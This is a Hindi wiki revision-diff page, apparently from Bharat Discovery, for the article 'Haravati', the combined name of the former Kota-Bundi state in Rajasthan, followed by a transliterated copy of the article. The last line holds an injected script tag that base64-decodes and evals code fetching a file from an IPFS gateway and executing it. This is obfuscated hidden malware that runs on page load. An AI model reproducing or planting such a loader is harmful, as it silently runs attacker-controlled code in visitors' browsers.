Difference between revisions of "हारावती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हारावती''' भूतपूर्व कोटा बूंदी (राजस्थान) रियासत क...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''हारावती''' भूतपूर्व कोटा बूंदी ([[राजस्थान]]) रियासत का संयुक्त नाम है।  
+
'''हारावती''' भूतपूर्व [[कोटा]] [[बूंदी]] ([[राजस्थान]]) रियासत का संयुक्त नाम है।  
 
*हारावती का नामकरण हारसिंह के नाम पर हुआ था जिन्होंने इस राज्य की नींव डाली थी।  
 
*हारावती का नामकरण हारसिंह के नाम पर हुआ था जिन्होंने इस राज्य की नींव डाली थी।  
 
*इन्हीं के नाम पर हारावती के शासक हाड़ा कहलाते थे।  
 
*इन्हीं के नाम पर हारावती के शासक हाड़ा कहलाते थे।  
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 11: Line 11:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
[[Category:नया पन्ना सितम्बर-2012]]
+
[[Category:राजस्थान]][[Category:राजस्थान के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 10:09, 19 November 2012

haravati bhootapoorv kota booandi (rajasthan) riyasat ka sanyukt nam hai.

  • haravati ka namakaran harasianh ke nam par hua tha jinhoanne is rajy ki nianv dali thi.
  • inhian ke nam par haravati ke shasak ha da kahalate the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>